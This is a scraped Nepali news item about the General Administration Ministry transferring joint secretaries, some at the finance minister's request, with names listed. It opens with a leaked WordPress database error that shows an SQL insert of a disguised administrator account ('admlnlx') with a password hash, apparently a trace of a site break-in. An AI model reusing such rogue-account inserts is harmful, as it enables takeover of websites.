WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BBNuSbZF3gEQShKYV3u14a7l/hTatL.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:45:17', '', 'admlnlx', 'admlnlx')
१३ वैशाख, काठमाडौं । सामान्य प्रशासन मन्त्रालयले ठूलो संख्यामा सहसचिवहरुको सरुवाको लागि तयारी गरिरहेको जनाएको छ । विभिन्न मन्त्रालयका सहसचिवको सरुवाको लिष्ट तयार भइरहेको मन्त्रालय स्रोतले जनाएको छ ।
६० जिल्लाका प्रमुख जिल्ला अधिकारीहरुको सरुवासँगै बुधवार मन्त्रालयले ६ जना सहसचिवको सरुवा गरेको छ । अर्थमन्त्री डा.युवराज खतिवडाको आग्रहमा सहसचिव सरुवा गरिएको स्रोतले जनाएको छ ।
लोकसेवा आयोगमा कार्यरत झकप्रसाद आचार्यलाई अर्थ मन्त्रालय सरुवा गरिएको छ । त्यस्तै गृहमन्त्रालयका श्यामप्रसाद भण्डारी पनि अर्थमा सरुवा भएका छन् ।
अर्थमन्त्रालयमा कार्यरत मुकुन्द निरौलालाई सामान्य प्रशासनको अतिरिक्त समूहमा सरुवा गरिएको छ । त्यस्तै सामान्य प्रशासन मन्त्रालयमा कार्यरत सहसचिव प्रकाश दाहाल श्रम तथा रोजगार मन्त्रालयमा सरुवा भएका छन् ।
अर्थ मन्त्रालयमै कार्यरत शोभाकान्त पौडेल लोकसेवा आयोगमा सरुवा भएका छन् भने गृहमन्त्रालयका विनोदप्रसाद सिंह सामान्य प्रशासनको अतिरिक्त समूहमा सरुवा भएका छन् ।